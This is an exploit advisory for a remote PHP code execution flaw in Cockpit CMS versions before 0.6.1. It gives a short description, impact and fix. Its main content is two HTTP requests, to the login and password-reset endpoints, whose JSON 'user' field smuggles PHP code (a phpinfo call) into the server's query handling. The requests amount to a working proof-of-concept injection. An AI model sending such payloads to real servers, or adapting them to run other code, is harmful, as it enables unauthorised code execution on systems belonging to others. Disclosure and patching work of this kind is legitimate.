Cockpit CMS 0.6.1 - Remote Code Execution

2021-01-07
ID: 103877
CVE: None
Download vulnerable application: None
# 
# Product: Cockpit CMS (https://getcockpit.com)
# Version: Cockpit CMS < 0.6.1
# Vulnerability Type: PHP Code Execution
# Exploit Author: Rafael Resende
# Attack Type: Remote
# Vulnerability Description
# Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.

# Exploit Login
  POST /auth/check HTTP/1.1
  Host: example.com
  User-Agent: Mozilla/5.0
  Content-Type: application/json; charset=UTF-8
  Content-Length: 52
  Origin: https://example.com

  {"auth":{"user":"test'.phpinfo().'","password":"b"}}

# Exploit Password reset
  POST /auth/requestreset HTTP/1.1
  Host: example.com
  User-Agent: Mozilla/5.0
  Content-Type: application/json; charset=UTF-8
  Content-Length: 28
  Origin: https://example.com

  {"user":"test'.phpinfo().'"}

## Impact
Allows attackers to execute malicious codes to get access to the server.

## Fix
Update to versions >= 0.6.1
1-4-2 (www01)